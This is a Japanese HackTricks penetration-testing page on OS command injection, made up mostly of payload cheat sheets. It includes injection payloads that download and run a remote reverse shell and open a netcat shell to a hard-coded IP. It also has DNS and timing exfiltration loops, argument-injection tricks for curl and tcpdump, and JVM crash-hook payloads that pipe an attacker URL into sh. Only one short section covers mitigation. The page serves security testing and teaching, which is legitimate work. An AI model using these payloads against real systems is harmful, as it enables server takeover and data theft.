Command Injection
Tip
AWSハッキングを学び、実践する:
HackTricks Training AWS Red Team Expert (ARTE)
GCPハッキングを学び、実践する:HackTricks Training GCP Red Team Expert (GRTE)
Azureハッキングを学び、実践する:
HackTricks Training Azure Red Team Expert (AzRTE)
HackTricksをサポートする
- サブスクリプションプランを確認してください!
- **💬 Discordグループまたはテレグラムグループに参加するか、Twitter 🐦 @hacktricks_liveをフォローしてください。
- HackTricksおよびHackTricks CloudのGitHubリポジトリにPRを提出してハッキングトリックを共有してください。
command Injectionとは?
command injection により、攻撃者はアプリケーションをホストするサーバ上で任意のオペレーティングシステムコマンドを実行できます。その結果、アプリケーションおよびその全データが完全に侵害される可能性があります。これらのコマンドの実行により、攻撃者は通常、アプリケーションの環境や基盤システムへの不正なアクセスや制御を取得します。
コンテキスト
入力がどこに注入されるかによっては、コマンドの前に引用されたコンテキストを終了させる(" または ' を使用して)必要がある場合があります。
Command Injection/Execution
#Both Unix and Windows supported
ls||id; ls ||id; ls|| id; ls || id # Execute both
ls|id; ls |id; ls| id; ls | id # Execute both (using a pipe)
ls&&id; ls &&id; ls&& id; ls && id # Execute 2º if 1º finish ok
ls&id; ls &id; ls& id; ls & id # Execute both but you can only see the output of the 2º
ls %0A id # %0A Execute both (RECOMMENDED)
ls%0abash%09-c%09"id"%0a # (Combining new lines and tabs)
#Only unix supported
`ls` # ``
$(ls) # $()
ls; id # ; Chain commands
ls${LS_COLORS:10:1}${IFS}id # Might be useful
#Not executed but may be interesting
> /var/www/html/out.txt #Try to redirect the output to a file
< /etc/passwd #Try to send some input to the command
制限 Bypasses
もし linux マシン内で任意のコマンドを実行 しようとしているなら、これらの Bypasses: を読むと役に立ちます。
例
vuln=127.0.0.1 %0a wget https://web.es/reverse.txt -O /tmp/reverse.php %0a php /tmp/reverse.php
vuln=127.0.0.1%0anohup nc -e /bin/bash 51.15.192.49 80
vuln=echo PAYLOAD > /tmp/pay.txt; cat /tmp/pay.txt | base64 -d > /tmp/pay; chmod 744 /tmp/pay; /tmp/pay
パラメータ
以下は、code injection や類似の RCE vulnerabilities に脆弱であり得る上位25のパラメータです(出典: link):
?cmd={payload}
?exec={payload}
?command={payload}
?execute{payload}
?ping={payload}
?query={payload}
?jump={payload}
?code={payload}
?reg={payload}
?do={payload}
?func={payload}
?arg={payload}
?option={payload}
?load={payload}
?process={payload}
?step={payload}
?read={payload}
?function={payload}
?req={payload}
?feature={payload}
?exe={payload}
?module={payload}
?payload={payload}
?run={payload}
?print={payload}
Time based data exfiltration
データ抽出: charごとに
swissky@crashlab▸ ~ ▸ $ time if [ $(whoami|cut -c 1) == s ]; then sleep 5; fi
real 0m5.007s
user 0m0.000s
sys 0m0.000s
swissky@crashlab▸ ~ ▸ $ time if [ $(whoami|cut -c 1) == a ]; then sleep 5; fi
real 0m0.002s
user 0m0.000s
sys 0m0.000s
DNS based data exfiltration
ツールは https://github.com/HoLyVieR/dnsbin のものをベースにしており、dnsbin.zhack.ca にもホストされています
1. Go to http://dnsbin.zhack.ca/
2. Execute a simple 'ls'
for i in $(ls /) ; do host "$i.3a43c7e4e57a8d0e2057.d.zhack.ca"; done
$(host $(wget -h|head -n1|sed 's/[ ,]/-/g'|tr -d '.').sudo.co.il)
DNS based data exfiltration をチェックするためのオンラインツール:
- dnsbin.zhack.ca
- pingb.in
Filtering bypass
Windows
powershell C:**2\n??e*d.*? # notepad
@^p^o^w^e^r^shell c:**32\c*?c.e?e # calc
Linux
Node.js child_process.exec と execFile
JavaScript/TypeScript のバックエンドを監査する際、Node.js の child_process API に頻繁に出くわします。
// Vulnerable: user-controlled variables interpolated inside a template string
const { exec } = require('child_process');
exec(`/usr/bin/do-something --id_user ${id_user} --payload '${JSON.stringify(payload)}'`, (err, stdout) => {
/* … */
});
exec() は shell (/bin/sh -c) を起動するため、shell に特別な意味を持つ文字(バッククォート、 ;, &&, |, $(), …)は、ユーザー入力が文字列に連結されると command injection を引き起こします。
緩和策: execFile() を使用する(または shell オプションなしで spawn() を使用)し、各引数を別々の配列要素として渡して shell を介さないようにする:
const { execFile } = require('child_process');
execFile('/usr/bin/do-something', [
'--id_user', id_user,
'--payload', JSON.stringify(payload)
]);
Real-world case: Synology Photos ≤ 1.7.0-0794 was exploitable through an unauthenticated WebSocket event that placed attacker controlled data into id_user which was later embedded in an exec() call, achieving RCE (Pwn2Own Ireland 2024).
先頭ハイフンによる Argument/Option 注入 (argv, no shell metacharacters)
すべての注入がシェルのメタ文字を必要とするわけではありません。アプリケーションが信頼できない文字列をシステムユーティリティへの引数として渡す場合(たとえ execve/execFile を使いシェルを介していなくても)、多くのプログラムは先頭が - や -- で始まる引数をオプションとして解釈します。これにより、攻撃者はシェルに入ることなくモードを切り替えたり、出力先を変更したり、危険な動作を引き起こしたりできます。
よく見られる場所:
- 組み込みの web UI / CGI ハンドラが
ping <user>、tcpdump -i <iface> -w <file>、curl <url>のようなコマンドを組み立てる場合。 - 中央集約型の CGI ルータ(例:
/cgi-bin/<something>.cgiに対してtopicurl=<handler>のようなセレクタパラメータがあり、複数のハンドラが同じ弱いバリデータを再利用している場合)。
試すこと:
- 下流のツールにフラグとして解釈されるよう、
-/--で始まる値を与える。 - 動作を変えたりファイルを書き込んだりするフラグを悪用する、例えば:
ping:-f/-c 100000でデバイスを負荷に耐えさせる(DoS)curl:-o /tmp/xで任意のパスへ書き込み、-K <url>で攻撃者制御の設定を読み込ませるtcpdump:-G 1 -W 1 -z /path/script.shで不安全なラッパー内の回転後実行を達成する
- プログラムが
--(end-of-options)をサポートしている場合、誤った場所に--を前置するような安易な緩和策を回避できるか試す。
集中型 CGI ディスパッチャに対する一般的な PoC の形:
POST /cgi-bin/cstecgi.cgi HTTP/1.1
Content-Type: application/x-www-form-urlencoded
# Flip options in a downstream tool via argv injection
topicurl=<handler>¶m=-n
# Unauthenticated RCE when a handler concatenates into a shell
topicurl=setEasyMeshAgentCfg&agentName=;id;
JVM 診断コールバックで確実に exec
_JAVA_OPTIONS、launcher config files、AdditionalJavaArguments fields in desktop agents など、inject JVM command-line arguments を可能にする任意のプリミティブは、アプリケーションの bytecode に触れずに信頼できる RCE に変えられます:
- 決定論的なクラッシュを強制する — metaspace や heap を縮小します:
-XX:MaxMetaspaceSize=16m(または小さな-Xmx)。これにより、ブートストラップの早期でもOutOfMemoryErrorが確実に発生します。 - エラーフックを設定する:
-XX:OnOutOfMemoryError="<cmd>"または-XX:OnError="<cmd>"は JVM が中断するたびに任意の OS コマンドを実行します。 - 回復試行を避け、payload を一度きりにするために
-XX:+CrashOnOutOfMemoryErrorをオプションで追加できます。
Example payloads:
-XX:MaxMetaspaceSize=16m -XX:OnOutOfMemoryError="cmd.exe /c powershell -nop -w hidden -EncodedCommand <blob>"
-XX:MaxMetaspaceSize=12m -XX:OnOutOfMemoryError="/bin/sh -c 'curl -fsS https://attacker/p.sh | sh'"
これらの診断情報はJVM自体によって解析されるため、shell metacharactersは不要で、コマンドはlauncherと同じ権限レベルで実行されます。Desktop IPC bugsがユーザー提供のuser-supplied JVM flagsを転送する場合(参照: Localhost WebSocket abuse)、それらはそのままOS command executionに直結します。
Brute-Force Detection List
参考
- https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection
- https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection
- https://portswigger.net/web-security/os-command-injection
- Extraction of Synology encrypted archives – Synacktiv 2025
- PHP proc_open manual
- HTB Nocturnal: IDOR → Command Injection → Root via ISPConfig (CVE‑2023‑46818)
- Unit 42 – TOTOLINK X6000R: Three New Vulnerabilities Uncovered
- When WebSockets Lead to RCE in CurseForge
Tip
AWSハッキングを学び、実践する:
HackTricks Training AWS Red Team Expert (ARTE)
GCPハッキングを学び、実践する:HackTricks Training GCP Red Team Expert (GRTE)
Azureハッキングを学び、実践する:
HackTricks Training Azure Red Team Expert (AzRTE)
HackTricksをサポートする
- サブスクリプションプランを確認してください!
- **💬 Discordグループまたはテレグラムグループに参加するか、Twitter 🐦 @hacktricks_liveをフォローしてください。
- HackTricksおよびHackTricks CloudのGitHubリポジトリにPRを提出してハッキングトリックを共有してください。


